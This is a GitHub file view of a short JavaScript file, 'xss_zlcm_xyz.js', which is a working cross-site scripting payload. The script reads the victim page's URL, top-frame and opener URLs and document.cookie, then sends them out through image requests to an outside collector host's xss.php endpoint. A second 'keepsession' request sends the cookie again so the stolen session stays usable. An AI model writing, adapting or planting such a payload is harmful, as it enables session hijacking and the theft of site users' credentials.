-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathxss_zlcm_xyz.js
31 lines (31 loc) · 957 Bytes
/
xss_zlcm_xyz.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
(function() {
(new Image()).src = 'http://xss.azwines.com.cn/xss.php?do=api&id=Jg3G&location=' + escape((function() {
try {
return document.location.href
} catch (e) {
return ''
}
})()) + '&toplocation=' + escape((function() {
try {
return top.location.href
} catch (e) {
return ''
}
})()) + '&cookie=' + escape((function() {
try {
return document.cookie
} catch (e) {
return ''
}
})()) + '&opener=' + escape((function() {
try {
return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
} catch (e) {
return ''
}
})());
})();
if ('1' == 1) {
keep = new Image();
keep.src = 'http://xss.azwines.com.cn/xss.php?do=keepsession&id=Jg3G&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};